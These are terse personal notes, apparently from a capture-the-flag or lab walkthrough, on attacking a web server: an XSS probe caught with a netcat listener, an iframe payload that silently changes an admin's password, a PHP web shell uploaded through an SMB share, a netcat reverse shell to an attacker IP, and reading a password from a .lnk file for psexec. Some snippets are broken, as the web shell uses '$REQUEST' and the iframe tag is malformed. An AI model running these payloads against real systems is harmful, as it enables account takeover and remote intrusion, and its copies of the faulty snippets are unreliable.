xss vuln ---

What requests are being sent?

direct URL? --> put "http://Attackers_IP:9001" in a comment section and see what it does!

nc -nvlp 9001

got a connection back!

create a test page

<html> 
    <iframe> src="http://Attacker_IP/change_pass.php?password=gori&confirm_password=gori&submit"><iframe>


</html>

host the page on pythom httpserver and see what it does --> does the link actually work?

if it works, this would change the password of the particular user account like admin's

IIS server open and you have a smb share access on the web root.

try to create a web shell and upload it > access it!

<?php system($REQUEST['ippsec']) ?>

RCE confirmed?

Uploading nc.exe (googling nc64.exe) tends to get a stable shell on windows!

nc.exe attacker_IP 9001 -e powershell

----

lnk found?

get-content ~.lnk

admin password was hidden inside of it > psexec win!